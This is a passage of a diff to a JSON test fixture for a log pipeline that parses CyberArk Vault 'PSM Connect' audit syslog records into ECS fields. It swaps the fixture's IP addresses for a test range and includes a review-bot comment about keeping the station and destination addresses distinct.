\u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
09:56:37\",\"IsoTimestamp\":\"2021-03-11T17:56:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", "action": "psm connect", @@ -696,20 +651,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -733,7 +679,7 @@ }, "@timestamp": "2021-03-11T20:23:25.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" 
@@ -745,15 +691,15 @@ ], "ip": [ "10.0.2.2", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-11T20:23:25Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 12:23:25\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T20:23:25Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty 
Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 12:23:25\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T20:23:25Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n 
\u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Connect", "issuer": "Administrator", "extra_details": { @@ -766,20 +712,20 @@ "psmid": "PSMServer", "session_id": "988b22e8-82a7-11eb-83b9-080027efd402", "src_host": "10.0.2.2", - "dst_host": "34.123.103.115" + "dst_host": "67.43.156.15" }, "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "PSM Connect", "timestamp": "Mar 11 12:23:25", "desc": "PSM Connect" 
@@ -790,8 +736,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.936279900Z", - "original": "\u003c5\u003e1 2021-03-11T20:23:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 12:23:25\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T20:23:25Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" 
Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 12:23:25\",\"IsoTimestamp\":\"2021-03-11T20:23:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:47.331168Z", + "original": "\u003c5\u003e1 2021-03-11T20:23:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 12:23:25\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T20:23:25Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n 
\u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 12:23:25\",\"IsoTimestamp\":\"2021-03-11T20:23:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM 
Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", "action": "psm connect", @@ -814,39 +760,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -863,7 +788,7 @@ }, "@timestamp": "2021-03-14T13:49:37.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" 
@@ -874,16 +799,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-14T13:49:37Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:49:37\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:49:37Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n 
\u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615729572\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:49:37\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:49:37Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n 
\u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615729572\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Connect", "issuer": "Administrator", "extra_details": { 
@@ -895,13 +819,13 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "d284c268-2ba0-4366-af52-e33459b073a1", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115" + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", @@ -913,9 +837,9 @@ "reset_immediately": "ReconcileTask", "last_task": "ReconcileTask" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Connect", "timestamp": "Mar 14 06:49:37", "desc": "PSM Connect" 
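Review bot: `station` and `dst_host` now carry the same address, `67.43.156.15`, whereas the old fixture kept the PSM station (34.71.250.247) distinct from the target host (34.123.103.115); as a consequence `related.ip` for this event shrinks from three entries to two in the preceding hunk, and the test can no longer tell whether the pipeline copies `Station` into `related.ip` or maps `DstHost` and `Station` into the correct ECS fields — a swap or a dropped field would still match. Give the station its own address from the same allowed range, e.g. `"station": "67.43.156.14"` (assuming the whole /24 is in the supported subset, which I cannot confirm from here), so that `related.ip` again lists three distinct values. This should be done in the `<Station>` element of the test log line the fixture is generated from, with the expected file regenerated rather than edited by hand, so that `raw`, `event.original` and the parsed fields stay consistent. The enclosing event object begins and ends outside this hunk.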
@@ -926,8 +850,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.936282500Z", - "original": "\u003c5\u003e1 2021-03-14T13:49:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:37\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:37Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" 